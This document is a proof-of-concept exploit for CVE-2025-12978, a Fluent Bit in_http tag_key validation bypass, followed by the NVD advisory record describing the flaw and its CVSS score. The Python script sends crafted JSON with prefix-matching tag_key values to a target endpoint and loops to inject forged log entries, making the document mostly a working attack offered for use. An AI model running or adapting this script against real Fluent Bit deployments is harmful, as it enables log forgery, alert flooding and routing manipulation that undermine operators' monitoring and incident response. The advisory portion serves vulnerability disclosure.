CVE-2025-12978

# CVE-2025-12978 PoC - Fluent Bit tag_key Validation Bypass # Target: Fluent Bit in_http plugin with tag_key configuration import requests import json TARGET_URL = "http://target:2020/" MALICIOUS_TAG = "admin" # Bypass: matches 'admin' prefix in tag_key PAYLOAD = { "key1": "value1", "key2": "value2", "tag_key": MALICIOUS_TAG, "fake_data": "injected_log_entry" } def exploit_tag_validation_bypass(): headers = { "Content-Type": "application/json", "Authorization": "Basic <credentials>" } # Normal request that should be rejected response = requests.post(TARGET_URL, json=PAYLOAD, headers=headers) print(f"Status: {response.status_code}") print(f"Response: {response.text}") # Send multiple requests to inject forged logs for i in range(10): payload = { "log": f"FORGED_LOG_{i}", "tag_key": f"admin_{i}", # Prefix matches, bypasses validation "timestamp": "2025-01-01T00:00:00Z" } requests.post(TARGET_URL, json=payload, headers=headers) if __name__ == "__main__": exploit_tag_validation_bypass()

{"cve": {"id": "CVE-2025-12978", "sourceIdentifier": "[email protected]", "published": "2025-11-24T15:15:46.873", "lastModified": "2025-11-28T15:21:42.540", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Fluent Bit in_http, in_splunk, and in_elasticsearch input plugins contain a flaw in the tag_key validation logic that fails to enforce exact key-length matching. This allows crafted inputs where a tag prefix is incorrectly treated as a full match. A remote attacker with authenticated or exposed access to these input endpoints can exploit this behavior to manipulate tags and redirect records to unintended destinations. This compromises the authenticity of ingested logs and can allow injection of forged data, alert flooding and routing manipulation."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:treasuredata:fluent_bit:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "4D0EA105-B741-4E44-828A-9300B09A7A79"}]}]}], "references": [{"url": "https://fluentbit.io/announcements/v4.1.0/", "source": "[email protected]", "tags": ["Release Notes"]}]}}